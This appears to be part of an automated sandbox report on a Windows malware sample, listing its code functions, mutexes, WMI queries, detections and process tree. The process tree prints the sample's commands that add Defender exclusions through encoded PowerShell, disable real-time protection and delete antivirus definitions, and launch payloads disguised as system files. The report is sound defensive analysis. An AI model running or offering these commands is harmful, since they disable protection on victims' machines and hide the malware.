                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 15_2_00007FF6D55F481C15_2_00007FF6D55F481C
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 15_2_00007FF6D55E603015_2_00007FF6D55E6030
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 15_2_00007FF6D55F1FE415_2_00007FF6D55F1FE4
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 15_2_00007FF6D55E37E015_2_00007FF6D55E37E0
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 15_2_00007FF6D55E87D015_2_00007FF6D55E87D0
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 15_2_00007FF6D55E21A015_2_00007FF6D55E21A0
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 15_2_00007FF6D55E198015_2_00007FF6D55E1980
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 15_2_00007FF6D55EA53015_2_00007FF6D55EA530
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 15_2_00007FF6D55E23A415_2_00007FF6D55E23A4
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 15_2_00007FF6D55E1B8415_2_00007FF6D55E1B84
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 15_2_00007FF6D55F438015_2_00007FF6D55F4380
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 15_2_00007FF6D55F103815_2_00007FF6D55F1038
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 15_2_00007FF6D55EEC3015_2_00007FF6D55EEC30
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 15_2_00007FF6D55E3BE415_2_00007FF6D55E3BE4
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 18_2_00007FFE0121750818_2_00007FFE01217508
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeCode function: 21_2_0055848E21_2_0055848E
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeCode function: 21_2_00566CDC21_2_00566CDC
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeCode function: 21_2_005540FE21_2_005540FE
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeCode function: 21_2_0056408821_2_00564088
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeCode function: 21_2_005600B721_2_005600B7
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeCode function: 21_2_0056715321_2_00567153
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeCode function: 21_2_005751C921_2_005751C9
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeCode function: 21_2_005662CA21_2_005662CA
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeCode function: 21_2_005532F721_2_005532F7
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeCode function: 21_2_005643BF21_2_005643BF
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeCode function: 21_2_0057D44021_2_0057D440
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeCode function: 21_2_0055F46121_2_0055F461
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeCode function: 21_2_0055C42621_2_0055C426
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeCode function: 21_2_005677EF21_2_005677EF
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeCode function: 21_2_0055286B21_2_0055286B
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeCode function: 21_2_0057D8EE21_2_0057D8EE
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeCode function: 21_2_005819F421_2_005819F4
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeCode function: 21_2_0055E9B721_2_0055E9B7
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeCode function: 21_2_00563E0B21_2_00563E0B
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeCode function: 21_2_0055EFE221_2_0055EFE2
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeCode function: 21_2_00574F9A21_2_00574F9A
                                  Source: C:\ProgramData\svchost.exeCode function: 29_2_0066848E29_2_0066848E
                                  Source: C:\ProgramData\svchost.exeCode function: 29_2_006640FE29_2_006640FE
                                  Source: C:\ProgramData\svchost.exeCode function: 29_2_006700B729_2_006700B7
                                  Source: C:\ProgramData\svchost.exeCode function: 29_2_0067408829_2_00674088
                                  Source: C:\ProgramData\svchost.exeCode function: 29_2_0067715329_2_00677153
                                  Source: C:\ProgramData\svchost.exeCode function: 29_2_006851C929_2_006851C9
                                  Source: C:\ProgramData\svchost.exeCode function: 29_2_006632F729_2_006632F7
                                  Source: C:\ProgramData\svchost.exeCode function: 29_2_006762CA29_2_006762CA
                                  Source: C:\ProgramData\svchost.exeCode function: 29_2_006743BF29_2_006743BF
                                  Source: C:\ProgramData\svchost.exeCode function: 29_2_0066F46129_2_0066F461
                                  Source: C:\ProgramData\svchost.exeCode function: 29_2_0068D44029_2_0068D440
                                  Source: C:\ProgramData\svchost.exeCode function: 29_2_0066C42629_2_0066C426
                                  Source: C:\ProgramData\svchost.exeCode function: 29_2_006777EF29_2_006777EF
                                  Source: C:\ProgramData\svchost.exeCode function: 29_2_0066286B29_2_0066286B
                                  Source: C:\ProgramData\svchost.exeCode function: 29_2_0068D8EE29_2_0068D8EE
                                  Source: C:\ProgramData\svchost.exeCode function: 29_2_006919F429_2_006919F4
                                  Source: C:\ProgramData\svchost.exeCode function: 29_2_0066E9B729_2_0066E9B7
                                  Source: C:\ProgramData\svchost.exeCode function: 29_2_00676CDC29_2_00676CDC
                                  Source: C:\ProgramData\svchost.exeCode function: 29_2_00673E0B29_2_00673E0B
                                  Source: C:\ProgramData\svchost.exeCode function: 29_2_0066EFE229_2_0066EFE2
                                  Source: C:\ProgramData\svchost.exeCode function: 29_2_00684F9A29_2_00684F9A
                                  Source: C:\Windows\System32\cmd.exeCode function: 32_2_0000023225B038A832_2_0000023225B038A8
                                  Source: C:\Windows\System32\cmd.exeCode function: 32_2_0000023225AFD0E032_2_0000023225AFD0E0
                                  Source: C:\Windows\System32\cmd.exeCode function: 32_2_0000023225AF1F2C32_2_0000023225AF1F2C
                                  Source: C:\Windows\System32\cmd.exeCode function: 32_2_0000023225B344A832_2_0000023225B344A8
                                  Source: C:\Windows\System32\cmd.exeCode function: 32_2_0000023225B2DCE032_2_0000023225B2DCE0
                                  Source: C:\Windows\System32\cmd.exeCode function: 32_2_0000023225B22B2C32_2_0000023225B22B2C
                                  Source: C:\Windows\System32\tasklist.exeCode function: 38_2_0000016716C31F2C38_2_0000016716C31F2C
                                  Source: C:\Windows\System32\tasklist.exeCode function: 38_2_0000016716C3D0E038_2_0000016716C3D0E0
                                  Source: C:\Windows\System32\tasklist.exeCode function: 38_2_0000016716C438A838_2_0000016716C438A8
                                  Source: C:\Windows\System32\tasklist.exeCode function: 38_2_0000016716C62B2C38_2_0000016716C62B2C
                                  Source: C:\Windows\System32\tasklist.exeCode function: 38_2_0000016716C6DCE038_2_0000016716C6DCE0
                                  Source: C:\Windows\System32\tasklist.exeCode function: 38_2_0000016716C744A838_2_0000016716C744A8
                                  Source: C:\Windows\System32\tasklist.exeCode function: 39_2_00000245E88E1F2C39_2_00000245E88E1F2C
                                  Source: C:\Windows\System32\tasklist.exeCode function: 39_2_00000245E88F38A839_2_00000245E88F38A8
                                  Source: C:\Windows\System32\tasklist.exeCode function: 39_2_00000245E88ED0E039_2_00000245E88ED0E0
                                  Source: C:\Windows\System32\tasklist.exeCode function: 39_2_00000245E8912B2C39_2_00000245E8912B2C
                                  Source: C:\Windows\System32\tasklist.exeCode function: 39_2_00000245E89244A839_2_00000245E89244A8
                                  Source: C:\Windows\System32\tasklist.exeCode function: 39_2_00000245E891DCE039_2_00000245E891DCE0
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeCode function: 42_2_00007FFD9B870D6F42_2_00007FFD9B870D6F
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeCode function: 42_2_00007FFD9BA2031742_2_00007FFD9BA20317
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeCode function: 42_2_00007FFD9BA34AFA42_2_00007FFD9BA34AFA
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeCode function: 42_2_00007FFD9BA33A8842_2_00007FFD9BA33A88
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeCode function: 42_2_00007FFD9BA372C042_2_00007FFD9BA372C0
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeCode function: 42_2_00007FFD9BA35A3142_2_00007FFD9BA35A31
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeCode function: 42_2_00007FFD9BA3498042_2_00007FFD9BA34980
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeCode function: 42_2_00007FFD9BA351D342_2_00007FFD9BA351D3
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeCode function: 42_2_00007FFD9BA370D842_2_00007FFD9BA370D8
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeCode function: 42_2_00007FFD9BA256ED42_2_00007FFD9BA256ED
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeCode function: 42_2_00007FFD9BA3672042_2_00007FFD9BA36720
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeCode function: 42_2_00007FFD9BA34DB842_2_00007FFD9BA34DB8
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeCode function: 42_2_00007FFD9BA36CFA42_2_00007FFD9BA36CFA
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeCode function: 42_2_00007FFD9BAC405A42_2_00007FFD9BAC405A
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeCode function: 42_2_00007FFD9BAC417542_2_00007FFD9BAC4175
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: String function: 00007FF72B0525F0 appears 100 times
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: String function: 00007FF72B052760 appears 36 times
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: String function: 00007FF6D55D2B30 appears 47 times
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeCode function: String function: 00B61D60 appears 31 times
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeCode function: String function: 00B61590 appears 57 times
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeCode function: String function: 0056EC50 appears 56 times
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeCode function: String function: 0056F5F0 appears 31 times
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeCode function: String function: 0056EB78 appears 39 times
                                  Source: C:\ProgramData\svchost.exeCode function: String function: 0067EC50 appears 56 times
                                  Source: C:\ProgramData\svchost.exeCode function: String function: 0067F5F0 appears 31 times
                                  Source: C:\ProgramData\svchost.exeCode function: String function: 0067EB78 appears 39 times
                                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 460 -p 7176 -ip 7176
                                  Source: unicodedata.pyd.5.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                                  Source: RuntimeBroker2.0.exe.0.drStatic PE information: No import functions for PE file found
                                  Source: 87Bym0x4Fy.exe, 00000000.00000002.1723649047.00000000039D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRuntimeBroker2.exe< vs 87Bym0x4Fy.exe
                                  Source: 87Bym0x4Fy.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  Source: libcrypto-1_1.dll.5.drStatic PE information: Section: UPX1 ZLIB complexity 0.9983946492448331
                                  Source: python310.dll.5.drStatic PE information: Section: UPX1 ZLIB complexity 0.9992644702528288
                                  Source: unicodedata.pyd.5.drStatic PE information: Section: UPX1 ZLIB complexity 0.9937050102833638
                                  Source: classification engineClassification label: mal100.rans.spre.troj.spyw.expl.evad.mine.winEXE@150/148@1/1
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 5_2_00007FF72B0529E0 GetLastError,FormatMessageW,MessageBoxW,5_2_00007FF72B0529E0
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeCode function: 13_2_00B5C652 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,13_2_00B5C652
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Program Files (x86)\windows mail\RKjtGQcyio.exe
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeFile created: C:\Users\user\AppData\Roaming\RuntimeBroker.exeJump to behavior
                                  Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7176
                                  Source: C:\Windows\System32\SIHClient.exeMutant created: {376155FF-95A0-46CA-8F57-ACB09EA70153}
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7948:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3104:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7404:120:WilError_03
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeMutant created: \Sessions\1\BaseNamedObjects\Local\3e64fe795a96f6df9d1018608996331101f86f90de28dc67ad34401869b49857
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8044:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8156:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3468:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7400:120:WilError_03
                                  Source: C:\Users\user\cscript.exeMutant created: NULL
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7316:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1544:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5288:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7576:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2288:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7820:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1272:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7080:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5776:120:WilError_03
                                  Source: C:\ProgramData\Microsoft\based.exeMutant created: \Sessions\1\BaseNamedObjects\r
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8160:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7064:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4600:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7940:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3052:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2912:120:WilError_03
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xmffrhfj.vbq.ps1Jump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\oGgyulsi03j6EO3sjCC.bat" "
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeCommand line argument: sfxname13_2_00B6037C
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeCommand line argument: sfxstime13_2_00B6037C
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeCommand line argument: STARTDLG13_2_00B6037C
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeCommand line argument: sfxname21_2_0056DF1E
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeCommand line argument: sfxstime21_2_0056DF1E
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeCommand line argument: STARTDLG21_2_0056DF1E
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeCommand line argument: xzZ21_2_0056DF1E
                                  Source: C:\ProgramData\svchost.exeCommand line argument: C:\ProgramData29_2_0067DF1E
                                  Source: C:\ProgramData\svchost.exeCommand line argument: sfxname29_2_0067DF1E
                                  Source: C:\ProgramData\svchost.exeCommand line argument: sfxstime29_2_0067DF1E
                                  Source: C:\ProgramData\svchost.exeCommand line argument: STARTDLG29_2_0067DF1E
                                  Source: C:\ProgramData\svchost.exeCommand line argument: xzk29_2_0067DF1E
                                  Source: 87Bym0x4Fy.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  Source: 87Bym0x4Fy.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                                  Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                                  Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                  Source: C:\Windows\System32\SIHClient.exeFile read: C:\Windows\System32\drivers\etc\hosts
                                  Source: C:\Windows\System32\SIHClient.exeFile read: C:\Windows\System32\drivers\etc\hosts
                                  Source: C:\Windows\System32\SIHClient.exeFile read: C:\Windows\System32\drivers\etc\hosts
                                  Source: C:\Windows\System32\SIHClient.exeFile read: C:\Windows\System32\drivers\etc\hosts
                                  Source: based.exe, 00000011.00000003.2130901869.000002A15E1C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                                  Source: 87Bym0x4Fy.exeVirustotal: Detection: 68%
                                  Source: 87Bym0x4Fy.exeReversingLabs: Detection: 60%
                                  Source: unknownProcess created: C:\Users\user\Desktop\87Bym0x4Fy.exe "C:\Users\user\Desktop\87Bym0x4Fy.exe"
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAaQBqACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHIAcgBwACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAZQByAHIAbwByADoAIABlAHgAcABlAGMAdABlAGQAIAAnACcAOwAnACcAIABiAGUAZgBvAHIAZQAgACcAJwByAGUAdAB1AHIAbgAnACcAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAGgAegB5ACMAPgA="
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAZABtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAawBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGEAbgBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAbAB5ACMAPgA="
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeProcess created: C:\Users\user\AppData\Roaming\RuntimeBroker.exe "C:\Users\user\AppData\Roaming\RuntimeBroker.exe"
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeProcess created: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe "C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe"
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeProcess created: C:\Users\user\AppData\Roaming\RuntimeBroker.exe "C:\Users\user\AppData\Roaming\RuntimeBroker.exe"
                                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 460 -p 7176 -ip 7176
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7176 -s 2308
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe -pbeznogym
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe -pbeznogym
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeProcess created: C:\ProgramData\Microsoft\hacn.exe "C:\ProgramData\Microsoft\hacn.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeProcess created: C:\ProgramData\Microsoft\based.exe "C:\ProgramData\Microsoft\based.exe"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\ProgramData\Microsoft\based.exe "C:\ProgramData\Microsoft\based.exe"
                                  Source: C:\ProgramData\Microsoft\hacn.exeProcess created: C:\ProgramData\Microsoft\hacn.exe "C:\ProgramData\Microsoft\hacn.exe"
                                  Source: C:\ProgramData\Microsoft\hacn.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe -pbeznogym
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe -pbeznogym
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
